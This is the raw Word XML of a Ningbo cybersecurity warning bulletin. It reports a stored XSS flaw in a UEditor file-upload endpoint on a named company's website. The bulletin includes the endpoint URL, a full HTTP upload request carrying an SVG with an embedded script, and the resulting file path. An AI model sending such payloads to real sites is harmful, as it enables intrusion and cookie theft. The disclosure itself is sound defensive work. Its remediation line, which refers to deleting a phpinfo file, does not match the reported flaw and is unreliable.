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D384F">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>宁波市网络安全预警通报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504DD018">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="FF0000" w:sz="18" w:space="1"/>
        </w:pBdr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C06CB9">
      <w:pPr>
        <w:pStyle w:val="3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kern w:val="2"/>
        </w:rPr>
        <w:t>1.漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4BEC1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞事件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5212BE">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="42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hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>宁波圣龙（集团）有限公司</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>所</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>属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ueditor存在存储xss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5414B119">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现时间：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8DF601">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="42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202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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>年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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>月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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A52F7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>影响产品：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AA12B7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>宁波圣龙（集团）有限公司</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>所属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ueditor系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE8CE1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D487AD">
      <w:pPr>
        <w:ind w:firstLine="420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宁波网信办安全监测测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>宁波圣龙（集团）有限公司</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>所属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ueditor存在存储xss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>漏洞，经测试，该漏洞情况属实。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FAFAAA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>影响危害：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9983A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156"/>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以通过注入恶意脚本窃取用户的Cookie、Session、登录凭证等敏感信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C2DF23">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
        <w:t>验证情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002903A">
      <w:pPr>
        <w:ind w:left="270" w:firstLine="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">URl： 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http://www.sheng-long.cn/static/js/ueditor/php/controller.php?action=uploadfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED7CD1">
      <w:pPr>
        <w:ind w:left="270" w:hanging="27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验证截图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF71266">
      <w:pPr>
        <w:ind w:left="270" w:hanging="270"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="880110"/>
            <wp:effectExtent l="0" t="0" r="444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5F6C">
      <w:pPr>
        <w:ind w:left="270" w:hanging="270"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>burp抓包写入poc：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB82AD0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POST /static/js/ueditor/php/controller.php?action=uploadfile HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BFFF3D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Host: www.sheng-long.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B30DE5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User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1374608D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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F585151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Content-Length: 602</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B0B29A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Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyi4iktemsbggnv5p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624B764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Accept-Encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34350329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</w:p>
    <w:p w14:paraId="676E97D6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------WebKitFormBoundaryyi4iktemsbggnv5p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E83B82A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Content-Disposition: form-data; name="upfile"; filename="test.xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E765F9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Content-Type: application/vnd.ms-excel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D3F951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</w:p>
    <w:p w14:paraId="2FED1F07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%3C?xml version="1.0" standalone="no"?%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30396652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%3C!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EFF4D8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%3Csvg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA63438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 xml:space="preserve">   %3Crect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784CEEFA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 xml:space="preserve">   %3Cscript type="text/javascript"%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3405C065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 xml:space="preserve">      console.log(document.domain);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386EEF6F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 xml:space="preserve">   %3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49417DD5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%3C/svg%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C5D9B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>------WebKitFormBoundaryyi4iktemsbggnv5p--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383DC709">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>返回200，文件上传成功，返回文件路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176940EA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEE11CC">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>拼接路径：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http://www.sheng-long.cn/ueditor/php/upload/file/20251205/1764910641162875.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A2BC9B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1052830"/>
            <wp:effectExtent l="0" t="0" r="952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C0AA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
        <w:t>3.处置措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C87FF">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修复需删除 phpinfo 文件、禁用相关输出函数或通过配置限制访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ED8E25">
      <w:pPr>
        <w:spacing w:before="156"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w: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137795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5467350" cy="635"/>
                <wp:effectExtent l="9525" t="10160" r="10160" b="9525"/>
                <wp:wrapNone/>
                <wp:docPr id="1001" name="自选图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20" cy="720"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1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6" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:0pt;margin-left:-7.5pt;margin-top:10.85pt;height:0.05pt;width:430.5pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:allowincell="f" o:gfxdata="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PyhcIXYAAAACQEAAA8AAAAAAAAAAQAgAAAAIgAAAGRy&#10;cy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kAOu15OzAEAAHwDAAAOAAAAAAAAAAEAIAAAACcB&#10;AABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAABlBQAAAAA=&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1.50236220472441pt" color="#000000" joinstyle="round"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId3" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851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SC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Liberation Sans">
    <w:altName w:val="Segoe Print"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="01"/>
    <w:family w:val="swiss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EB05B">
    <w:pPr>
      <w:pStyle w:val="10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E6A74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFDE6A74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61E"/>
    <w:rsid w:val="000456F2"/>
    <w:rsid w:val="00084146"/>
    <w:rsid w:val="000D20ED"/>
    <w:rsid w:val="00293A6B"/>
    <w:rsid w:val="002B51FB"/>
    <w:rsid w:val="0030061E"/>
    <w:rsid w:val="004152A8"/>
    <w:rsid w:val="004E1C3B"/>
    <w:rsid w:val="005669CC"/>
    <w:rsid w:val="00686184"/>
    <w:rsid w:val="008604B0"/>
    <w:rsid w:val="008C39AD"/>
    <w:rsid w:val="00AE6603"/>
    <w:rsid w:val="00BA50F7"/>
    <w:rsid w:val="00C908CE"/>
    <w:rsid w:val="00D6589B"/>
    <w:rsid w:val="00DA2725"/>
    <w:rsid w:val="00E1200E"/>
    <w:rsid w:val="01CD2E50"/>
    <w:rsid w:val="01F81002"/>
    <w:rsid w:val="024D55D3"/>
    <w:rsid w:val="046378E3"/>
    <w:rsid w:val="05E30AB8"/>
    <w:rsid w:val="069E02B3"/>
    <w:rsid w:val="08957CDC"/>
    <w:rsid w:val="09024A32"/>
    <w:rsid w:val="09252865"/>
    <w:rsid w:val="0A0B15AC"/>
    <w:rsid w:val="0C4F19CB"/>
    <w:rsid w:val="0DC54B92"/>
    <w:rsid w:val="0EC361FA"/>
    <w:rsid w:val="11680868"/>
    <w:rsid w:val="1A547577"/>
    <w:rsid w:val="1B811858"/>
    <w:rsid w:val="1CE4498C"/>
    <w:rsid w:val="1D143D47"/>
    <w:rsid w:val="1DB26C50"/>
    <w:rsid w:val="201956D2"/>
    <w:rsid w:val="206F66E4"/>
    <w:rsid w:val="20A51EA1"/>
    <w:rsid w:val="20D802B3"/>
    <w:rsid w:val="2116490E"/>
    <w:rsid w:val="2191760C"/>
    <w:rsid w:val="22C8364E"/>
    <w:rsid w:val="22F76A72"/>
    <w:rsid w:val="231735A8"/>
    <w:rsid w:val="248B3B4C"/>
    <w:rsid w:val="24CF3CCC"/>
    <w:rsid w:val="278575B8"/>
    <w:rsid w:val="29ADCB54"/>
    <w:rsid w:val="2AD155DA"/>
    <w:rsid w:val="2B033201"/>
    <w:rsid w:val="2B982962"/>
    <w:rsid w:val="2EC80C0C"/>
    <w:rsid w:val="31425DDE"/>
    <w:rsid w:val="315A7317"/>
    <w:rsid w:val="32130F51"/>
    <w:rsid w:val="33CB7C1F"/>
    <w:rsid w:val="33FA3F36"/>
    <w:rsid w:val="34970D22"/>
    <w:rsid w:val="34AE5999"/>
    <w:rsid w:val="35130E4A"/>
    <w:rsid w:val="389B393F"/>
    <w:rsid w:val="39AF02DA"/>
    <w:rsid w:val="3A2F3720"/>
    <w:rsid w:val="3AB5B729"/>
    <w:rsid w:val="3B5B2830"/>
    <w:rsid w:val="3C3A1930"/>
    <w:rsid w:val="3C434192"/>
    <w:rsid w:val="3F2F1017"/>
    <w:rsid w:val="40377B31"/>
    <w:rsid w:val="42AE5C8C"/>
    <w:rsid w:val="42E66AC7"/>
    <w:rsid w:val="443C7099"/>
    <w:rsid w:val="445843E4"/>
    <w:rsid w:val="44B149D9"/>
    <w:rsid w:val="454B2F2B"/>
    <w:rsid w:val="45CE131F"/>
    <w:rsid w:val="4617304D"/>
    <w:rsid w:val="46CC2351"/>
    <w:rsid w:val="47495A20"/>
    <w:rsid w:val="49993A07"/>
    <w:rsid w:val="4AAA237E"/>
    <w:rsid w:val="4AB831E7"/>
    <w:rsid w:val="4AE40C35"/>
    <w:rsid w:val="4BD3A346"/>
    <w:rsid w:val="4C3C21A3"/>
    <w:rsid w:val="4E9D5D56"/>
    <w:rsid w:val="505774D1"/>
    <w:rsid w:val="53267713"/>
    <w:rsid w:val="53A824AA"/>
    <w:rsid w:val="55287922"/>
    <w:rsid w:val="55556AC8"/>
    <w:rsid w:val="556D121E"/>
    <w:rsid w:val="56165500"/>
    <w:rsid w:val="564C4C31"/>
    <w:rsid w:val="58312587"/>
    <w:rsid w:val="58921AD3"/>
    <w:rsid w:val="59433052"/>
    <w:rsid w:val="5A29059F"/>
    <w:rsid w:val="5A2F17C9"/>
    <w:rsid w:val="5AC8267C"/>
    <w:rsid w:val="5C9122C7"/>
    <w:rsid w:val="5CD74E4D"/>
    <w:rsid w:val="5F7D99A1"/>
    <w:rsid w:val="5FEA2EBA"/>
    <w:rsid w:val="60906066"/>
    <w:rsid w:val="61D92445"/>
    <w:rsid w:val="6756735B"/>
    <w:rsid w:val="6836413B"/>
    <w:rsid w:val="6AA1507A"/>
    <w:rsid w:val="6BAE2224"/>
    <w:rsid w:val="6DDE247F"/>
    <w:rsid w:val="6E075FA3"/>
    <w:rsid w:val="71E5383F"/>
    <w:rsid w:val="72E326E7"/>
    <w:rsid w:val="752970A1"/>
    <w:rsid w:val="75556682"/>
    <w:rsid w:val="75D307FB"/>
    <w:rsid w:val="7B9C51F9"/>
    <w:rsid w:val="7C905799"/>
    <w:rsid w:val="7D3B0787"/>
    <w:rsid w:val="7D5BDF4D"/>
    <w:rsid w:val="7F5C7C4C"/>
    <w:rsid w:val="7F6206BF"/>
    <w:rsid w:val="BD5E182B"/>
    <w:rsid w:val="BDB1781D"/>
    <w:rsid w:val="DA771A61"/>
    <w:rsid w:val="F973C6CD"/>
    <w:rsid w:val="F97B792E"/>
    <w:rsid w:val="F9F7600C"/>
    <w:rsid w:val="FBFD3AFE"/>
    <w:rsid w:val="FF3B07BF"/>
    <w:rsid w:val="FFF8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qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:r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CJK SC"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="38"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18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Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="24"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"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10">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="21"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11">
    <w:name w:val="List"/>
    <w:basedOn w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:cs="Noto Sans CJK SC"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="3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13">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="15">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="14"/>
    <w:qFormat/>
    <w:uiPriority w:val="5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qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="18">
    <w:name w:val="HTML Code"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="宋体" w:cs="宋体"/>
      <w:color w:val="333333"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="访问过的 Internet 链接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customStyle="1" w:styleId="20">
    <w:name w:val="Internet 链接"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="页眉 字符"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
